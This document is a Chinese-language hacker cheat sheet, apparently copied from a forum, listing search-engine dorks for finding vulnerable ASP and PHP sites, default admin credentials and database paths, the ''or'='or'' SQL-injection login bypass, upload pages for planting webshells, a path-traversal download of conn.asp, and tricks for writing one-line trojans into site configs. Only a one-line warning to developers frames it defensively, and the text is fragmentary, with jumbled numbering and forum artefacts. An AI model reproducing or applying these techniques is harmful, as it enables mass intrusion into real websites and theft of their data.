黑客常常利用这些漏洞,切入进行攻击,所以在程序员在开发的时候要多注意…
1,
到 GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为 MSSQL 数据库!
2,
到 Google ,site:cq.cn inurl:asp
http://skyf.org/wp/wp-admin/post.php?post=865&action=edit#
3,
利用挖掘鸡和一个 ASP 木马.
文件名是 login.asp
路径组是/manage/
关键词是 went.asp
用’or’='or’来登陆
以下内容需要回复才能看到
4,
关键字:Co Net MIB Ver 1.0 网站后台管理系统
帐号密码为 ‘or’=‘or’
动感购物系统
inurl:help.asp 登陆,如未注册成为会员!
upLoad_bm1.asp 和 upLoad_c1.asp 这两个随便选个,一般管理员都忽视了这 2 漏洞
6。
默认数据库地址 blogdata/acblog.asa
关键字:acblog
百度 /htdocs
注册里可以直接上传 asa 文件!
/Database/#newasp.mdb
关键词:NewAsp SiteManageSystem Version
用挖掘机
关键字:Powered by WEBBOY
页面:/upfile.asp
10.
baidu 中搜索关键字 Ver5.0 Build 0519
(存在上传漏洞)
Upfile_Article.asp bbs/upfile.asp
输入关键字:powered by mypower ,
inurl:winnt\system32\inetsrv\ 在 google 里面输入这个就可以找到很多网站
现在 GOOGLE 搜索关键字 intitle:网站小助手 inurl:asp
键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采装备购买 站内流
言 友情连接 本站论坛
挖掘鸡的关键字 添 setup.asp
VBulletin 论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
网站猎手 下载地址:百度 Google!
Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了打开百度或 GOOGLE 搜索,输入 powered by comersus ASP shopping cart
open source。 这是一个商场系统。网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus 系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在 database/ 后的,
所以 database/comersus.mdb
comersus_listCategoriesTree.asp 换成 database/comersus.mdb,不能下载。
那样把前一个’‘store/’'除去,再加上 database/comersus.mdb 试试
无忧传奇官方站点程序。
后台管理地址:http://您的域名/msmiradmin/
默认后台管理帐号:msmir
默认后台管理密码:msmirmsmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为 ***********/Conn.asp
百度里输入/skins/default/
利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php 远程包含漏洞 工具使用
上传漏洞.
工具 : Domain3.5
网站猎手 1.5 版
关键字 powered by mypower
检测的页面或文件插入 upfile_photo.asp
新云漏洞
这个漏洞 ACCESS 和 SQL 版通吃。
Google 搜索关键字 “关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地
图 - 管理登录”
把 flash/downfile.asp?url=uploadfile/…/…/conn.asp 提交到网站根目录。就可以下载
conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23 替换就可以下载了
\database%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb
通吃所有商城+动力上传系统
使用工具:挖掘鸡 v1.1 明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线
支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp
动力入侵:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
注射漏洞
百度搜索:oioj’s blog
24
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:‘or’=‘or’
入侵魔兽学盟禁止字符
需要的工具:ASP 木马一只。
Domain3.5 明小子
关键字:All Right Reserved Design:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb
漏洞是利用管理员 iis 设置的失误
用 baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp
国外站的爆库漏洞
关键字:sad Raven’s Guestbook
密码地址:/passwd.dat
后台地址:/admin.php
Discuz 4.1.0 跨站漏洞
利用工具:1,WAP 浏览器
2,WAP 编码转换器
关键字:“intext:Discuz! 4.1.0”
关键字:尚奈克斯
后台路径/system/manage.asp
直接传 ASP 木马
工具
1:网站猎手
2:大马一个
关键字:切勿关闭 Cookies 功能,否则您将不能登录
插入 diy.asp
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb
工具: 挖掘机辅臣数据库读取器
关键字: 企业简介 产品展示产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp
关键子 XXX inurl:Nclass.asp
在"系统设置"里写个木马。
会被保存到 在 config.asp 内。
不进后台照样拿动网 WEBSHELL
data.asp?action=BackupData 动网数据库备份默认路径
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:‘or’=‘or’
关键字:Powered by:QCDN_NEWS
随便扫遍文章加一个’ ,来试探注入点
后台地址:admin_index.asp
入侵雷池新闻发布系统
关键字:leichinews
去掉 leichinews 后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马…
进访问 uppic anran.asp 登陆马.
关键字:Power System Of Article Management Ver 3.0 Build 20030628
默认数据库:database\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!
一、通过 GOOGLE 搜索找大量注入点
关键字:asp?id=1 gov.jp/ asp?id=
页数:100
语言:想入侵哪个国家就填什么语言吧
关键字:Powered by:94KKBBS 2005
利用密码找回功能 找回 admin
提问:ddddd 回答:ddddd
关键字:inurl:Went.asp
后台为 manage/login.asp
后台密码: ‘or’=’ 或者 ‘or’‘=’‘or’ 登录 进入
默认数据库地址:Database/DataShop.mdb
关键字:****** inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话木马
工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!
关键字:程序核心:BJXSHOP 网上开店专家
后台:/admin

